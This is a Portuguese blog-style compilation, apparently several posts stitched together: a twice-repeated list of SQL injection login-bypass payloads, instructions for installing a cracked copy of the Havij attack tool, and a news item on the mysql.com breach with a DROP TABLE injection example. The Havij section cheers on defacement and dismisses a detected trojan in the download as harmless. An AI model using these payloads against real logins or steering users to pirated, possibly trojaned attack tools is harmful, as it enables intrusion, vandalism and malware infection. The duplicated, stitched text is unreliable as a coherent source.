SQL Injection 101, Login tricks
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
Mais dicas em: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
SQL Injection 101, Login tricks
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
Mais dicas em: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
Havij uma das melhores ferramentas para automação de ataques SQL Injection que existem no mercado, ele é simples de usar e possui uma série de tutoriais em vídeo explicando como fazer, inclusive em português como demonstrado abaixo (desculpem pela voz do rapaz):
Como esta versão não tem loader, e tem que registrar, ele parece estar completamente sem bugs.
Vamos ao que interessa…
1- Instale o Havij (NÃO ABRA)
2- Rode o patch e crackeie o havij
3- Agora pode abrir o Havij, abra e registre ele clicando no botão register, com o seguinte nome: Cracked@By.Exidous
4- Selecione o arquivo de licensa e registre o Havij
5- Bom defacement!
Link para download: http://www.megaupload.com/?d=TUH2E9GG
Link scan: http://www.virustotal.com/file-scan/…c75-1311021286
PS: O trojan encontrado é por causa do software que foi usado para programação do patcher, não é uma ameaça.
Funcionando que não funcionava com loader:
Uso de Https;
Comandos CMD;
Comandos Query que não pegavam;
Sem problemas de runtime error;
Etc.
Uma tela com a cara do Havij:
O Havij é voltado para o mundo windows e deve ser usado com moderação.
Em mais um exemplo de como o ditado “casa de ferreiro, espeto de pau” é verdadeiro, um ataque recente ao site mysql.com não só foi bem sucedido, como os crackers também acessaram e roubaram diversas informações cruciais. A ironia da história? A invasão foi realizada através de uma simples SQL Injection!
Ataques de SQL Injection normalmente acontecem em sistemas amadores, onde os desenvolvedores (por desconhecimento ou desatenção) não sanitizam as chamadas ao banco de dados, impedindo a inclusão de comandos SQL via adição de código extra. Por exemplo, um simples:
SELECT * FROM 'clientes' WHERE 'id'=1
Pode virar um pesadelo simplesmente adicionando um comando extra, através de chamadas GET ou POST:
SELECT * FROM 'clientes' WHERE 'id'=1;DROP TABLE 'usuarios';
Onde o segundo comando apagaria toda a tabela “usuarios”. Ou seja, o truque mais bobo do manual. E é exatamente essa falha que foi explorada no site oficial do MySQL, por incrível que pareça.
Da invasão, foram obtidas listas de usuários, com seus e-mails e suas respectivas senhas criptografadas. Tais listas já foram divulgadas pela internet, e algumas até mesmo já foram quebradas, revelando dados curiosos: um diretor do MySQL tinha uma senha com apenas 4 (quatro!) caracteres!
A recomendação dos responsáveis pelo site é que, se você tiver uma conta no mysql.com (ou nos espelhos mysql.fr, mysql.de e mysql.it), que acesse o quanto antes e altere a senha atual. Se essa senha for comum para contas em outros sites, faça o mesmo nesses serviços.